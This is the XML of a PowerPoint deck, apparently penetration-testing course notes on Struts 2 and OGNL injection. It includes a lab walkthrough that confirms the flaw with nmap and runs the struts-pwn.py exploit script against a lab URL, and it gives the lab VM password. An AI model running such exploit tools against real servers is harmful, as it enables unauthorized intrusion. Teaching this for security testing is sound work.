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783" r:id="rId1"/>
    <p:sldMasterId id="2147483785" r:id="rId2"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId26"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId27"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="795" r:id="rId3"/>
    <p:sldId id="804" r:id="rId4"/>
    <p:sldId id="799" r:id="rId5"/>
    <p:sldId id="792" r:id="rId6"/>
    <p:sldId id="703" r:id="rId7"/>
    <p:sldId id="707" r:id="rId8"/>
    <p:sldId id="811" r:id="rId9"/>
    <p:sldId id="800" r:id="rId10"/>
    <p:sldId id="808" r:id="rId11"/>
    <p:sldId id="821" r:id="rId12"/>
    <p:sldId id="823" r:id="rId13"/>
    <p:sldId id="809" r:id="rId14"/>
    <p:sldId id="822" r:id="rId15"/>
    <p:sldId id="736" r:id="rId16"/>
    <p:sldId id="812" r:id="rId17"/>
    <p:sldId id="813" r:id="rId18"/>
    <p:sldId id="814" r:id="rId19"/>
    <p:sldId id="815" r:id="rId20"/>
    <p:sldId id="807" r:id="rId21"/>
    <p:sldId id="797" r:id="rId22"/>
    <p:sldId id="820" r:id="rId23"/>
    <p:sldId id="806" r:id="rId24"/>
    <p:sldId id="615" r:id="rId25"/>
  </p:sldIdLst>
  <p:sldSz cx="12192000" cy="6858000"/>
  <p:notesSz cx="7315200" cy="9601200"/>
  <p:embeddedFontLst>
    <p:embeddedFont>
      <p:font typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
      <p:regular r:id="rId28"/>
      <p:bold r:id="rId29"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Mangal" panose="02040503050203030202" pitchFamily="18" charset="0"/>
      <p:regular r:id="rId30"/>
      <p:bold r:id="rId31"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
      <p:regular r:id="rId32"/>
      <p:bold r:id="rId33"/>
      <p:italic r:id="rId34"/>
      <p:boldItalic r:id="rId35"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Georgia" panose="02040502050405020303" pitchFamily="18" charset="0"/>
      <p:regular r:id="rId36"/>
      <p:bold r:id="rId37"/>
      <p:italic r:id="rId38"/>
      <p:boldItalic r:id="rId39"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
      <p:regular r:id="rId40"/>
      <p:bold r:id="rId41"/>
      <p:italic r:id="rId42"/>
      <p:boldItalic r:id="rId43"/>
    </p:embeddedFont>
  </p:embeddedFontLst>
  <p:defaultTextStyle>
    <a:defPPr>
      <a:defRPr lang="en-US"/>
    </a:defPPr>
    <a:lvl1pPr algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
      <a:spcBef>
        <a:spcPct val="0"/>
      </a:spcBef>
      <a:spcAft>
        <a:spcPct val="0"/>
      </a:spcAft>
      <a:defRPr sz="24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864"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uss McRee" initials="RM" lastIdx="2" clrIdx="0"/>
  <p:cmAuthor id="1" name="Moses Hernandez" initials="MH" lastIdx="1"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notes" clrMode="gray" hidden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11116"/>
    <a:srgbClr val="93D050"/>
    <a:srgbClr val="4BACC6"/>
    <a:srgbClr val="FF3300"/>
    <a:srgbClr val="FFCC00"/>
    <a:srgbClr val="CC3300"/>
    <a:srgbClr val="0000FF"/>
    <a:srgbClr val="CC6600"/>
    <a:srgbClr val="FF6600"/>
    <a:srgbClr val="FFFF00"/>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47" autoAdjust="0"/>
    <p:restoredTop sz="75312" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToObjects="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="65" d="100"/>
          <a:sy n="65" d="100"/>
        </p:scale>
        <p:origin x="1301" y="53"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="864"/>
        <p:guide pos="3840"/>
      </p:guideLst>
    </p:cSldViewPr>
  </p:slideViewPr>
  <p:outlineViewPr>
    <p:cViewPr>
      <p:scale>
        <a:sx n="33" d="100"/>
        <a:sy n="33" d="100"/>
      </p:scale>
      <p:origin x="0" y="-73416"/>
    </p:cViewPr>
    <p:sldLst>
      <p:sld r:id="rId1" collapse="1"/>
    </p:sldLst>
  </p:outlineViewPr>
  <p:notesTextViewPr>
    <p:cViewPr>
      <p:scale>
        <a:sx n="200" d="100"/>
        <a:sy n="200" d="100"/>
      </p:scale>
      <p:origin x="0" y="0"/>
    </p:cViewPr>
  </p:notesTextViewPr>
  <p:sorterViewPr>
    <p:cViewPr>
      <p:scale>
        <a:sx n="100" d="100"/>
        <a:sy n="100" d="100"/>
      </p:scale>
      <p:origin x="0" y="0"/>
    </p:cViewPr>
  </p:sorterViewPr>
  <p:notesViewPr>
    <p:cSldViewPr snapToObjects="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="60" d="100"/>
          <a:sy n="60" d="100"/>
        </p:scale>
        <p:origin x="3101" y="53"/>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9"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2.fntdata"/><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4"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handoutMaster" Target="handoutMasters/handout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47" tIns="48324" rIns="96647" bIns="48324" rtlCol="0"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="1300"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Date Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4143587" y="0"/>
            <a:ext cx="3169920" cy="480060"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="96647" tIns="48324" rIns="96647" bIns="48324" rtlCol="0"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="1300"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{92F61736-5202-2B4C-A304-EE15A07E04E9}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>18/04/19</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Footer Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="9119474"/>
            <a:ext cx="3169920" cy="480060"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="96647" tIns="48324" rIns="96647" bIns="48324" rtlCol="0" anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="1300"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>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47" tIns="48324" rIns="96647" bIns="48324" rtlCol="0" anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="1300"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{6D2ABBF4-008A-5646-B191-1FC7340E19C0}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1442137987"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMap bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>
  <p:hf sldNum="0" hdr="0" ftr="0" dt="0"/>
</p:handoutMaster>
</file>

<file path=ppt/media/image10.png>
</file>

<file path=ppt/media/image11.png>
</file>

<file path=ppt/media/image12.png>
</file>

<file path=ppt/media/image13.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4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="720725"/>
            <a:ext cx="6400800" cy="36004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609600" y="4560570"/>
            <a:ext cx="6096000" cy="4320540"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="96647" tIns="48324" rIns="96647" bIns="48324"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74524406"/>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ts val="300"/>
      </a:spcBef>
      <a:spcAft>
        <a:spcPct val="0"/>
      </a:spcAft>
      <a:defRPr sz="1000" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
      </a:defRPr>
    </a:lvl1pPr>
    <a:lvl2pPr marL="695325" indent="-238125" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
      <a:spcBef>
        <a:spcPts val="300"/>
      </a:spcBef>
      <a:spcAft>
        <a:spcPct val="0"/>
      </a:spcAft>
      <a:defRPr sz="1000" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
      </a:defRPr>
    </a:lvl2pPr>
    <a:lvl3pPr marL="914400" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
      <a:spcBef>
        <a:spcPts val="300"/>
      </a:spcBef>
      <a:spcAft>
        <a:spcPct val="0"/>
      </a:spcAft>
      <a:defRPr sz="1000" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
      </a:defRPr>
    </a:lvl3pPr>
    <a:lvl4pPr marL="1371600" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
      <a:spcBef>
        <a:spcPts val="300"/>
      </a:spcBef>
      <a:spcAft>
        <a:spcPct val="0"/>
      </a:spcAft>
      <a:defRPr sz="1000" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
      </a:defRPr>
    </a:lvl4pPr>
    <a:lvl5pPr marL="1828800" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
      <a:spcBef>
        <a:spcPts val="300"/>
      </a:spcBef>
      <a:spcAft>
        <a:spcPct val="0"/>
      </a:spcAft>
      <a:defRPr sz="1000" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="Times New Roman" pitchFamily="18"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3024" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="F26B43"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="2" pos="2304"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2388" cy="360045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ts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2064230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lvl="1" indent="0" defTabSz="914266">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>Running the struts-pwn.py script against the base URL of the site we get a false negative. The next step is to add Burp as a proxy so that we can see what is going on. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30240936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lvl="1" indent="0" defTabSz="914266">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>In order to identify a URL that has the URL pointing to .action in the Struts 2 application while proxying through Burp navigate to http://struts.sec642.org:8080/showcase</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="1" indent="0" defTabSz="914266">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>Click on: File, then Upload, and then Single File Upload. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="1" indent="0" defTabSz="914266">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>Copy this URL, we will use it for nmap and struts-pwn.py  </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7137792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lvl="1" indent="0" defTabSz="914266">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> for the nmap commands, it will first prompt you for the samurai password, which is samurai. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="1" indent="0" defTabSz="914266">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="1" indent="0" defTabSz="914266">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>If we run the nmap NSE script without the argument for the full URL we get a false negative. Only once we use the '--script-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>args</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>' with 'path=/showcase/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>fileupload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>upload.action</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>' does it run correctly. We have now successfully validated the vulnerability, and that it is likely exploitable.  </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11066788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lvl="1" indent="0" defTabSz="914266">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>This is the syntax for the struts-pwn.py script to run correctly. We must give it the URL to the Struts 2 application .action</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="1" indent="0" defTabSz="914266">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="1" indent="0" defTabSz="914266">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pl-PL" baseline="0" dirty="0"/>
              <a:t>./struts-pwn.py  -u  http://struts.sec642.org:8080/showcase/fileupload/upload.action</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="1" indent="0" defTabSz="914266">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="1" indent="0" defTabSz="914266">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>Success! </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22218413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2388" cy="3600450"/>
          </a:xfrm>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Notes Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33936682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2388" cy="3600450"/>
          </a:xfrm>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Notes Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="42199636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page intentionally left blank.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4026181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dirty="0"/>
              <a:t>As mentioned,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" baseline="0" dirty="0"/>
              <a:t>w</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>eb frameworks </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>increase</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>application's complexity. It</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> does this in a few ways. First, if i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ncreases the number of requests and parameters that browsers make,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> increasing our jobs at testing. Second, it changes our approach completely because certain bug classes may not be as present or as common in a framework because some mistakes are taken care of by the framework itself. Lastly, it a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>dds additional layers of obscurity and abstraction, which we must wade our way through to</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> understand how the application works. The framework, however, may mean that a developer may be more of a novice or have a misunderstanding of how the design patterns are applied. Common misunderstandings show up later in the day, but when a bug class is found in one framework or language, it pervasively is discovered in others. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Although</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> the complexity is a disadvantage to penetration testers, there is one major benefit we gain by becoming familiar with the major frameworks. The f</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>amiliarity with a framework enables us to optimize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> our tests. First, we can i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>dentify known</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>vulnerabilities in the framework. Second, we can test for common defaults and known weaknesses in each framework, such as ASP.NET's failure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> to properly expire session IDs. Finally, we can f</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ocus our testing on custom components that</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> are written on top of the framework. It also starts to become apparent that many of these frameworks share common libraries, which in essence a developer uses with one another to make the applications work. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3499099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Struts2 changed its resource extension to .action so that can</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> be a way to identify it; however, struts2 can still work with the old .do extension or any extension that the developer wants to program. But .action is a good indicator to watch for. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Struts2 uses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> a u</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ser input that</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> is sent to the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> action, which</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> in addition to a form. The form in struts2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> is called a model. However, d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>evelopers usually just call the action, which</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>easier. Another addition</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> to struts2 is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Object Graph Notation Language (OGNL),</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> the template engine. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Input parameters are OGNL statements that run on the action or model, creating</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> the view. OGNL is roughly </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>equivalent to Java in expressiveness, thus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> providing a power tool to developers. However, as you see later, additional power to a developer often means additional power to the attacker.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="235583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266">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>However,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> with many of the security benefits that come with struts2, one of the most exploited features has been OGNL. A large percentage of the vulnerabilities found in the struts2 framework have been there, allowing attackers to execute arbitrary OGNL statements. Examples on the slide interpret the value of the message parameter as OGNL code and not raw data.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1658588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Struts had a bad year in 2017. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29765637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2388" cy="3600450"/>
          </a:xfrm>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Notes Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
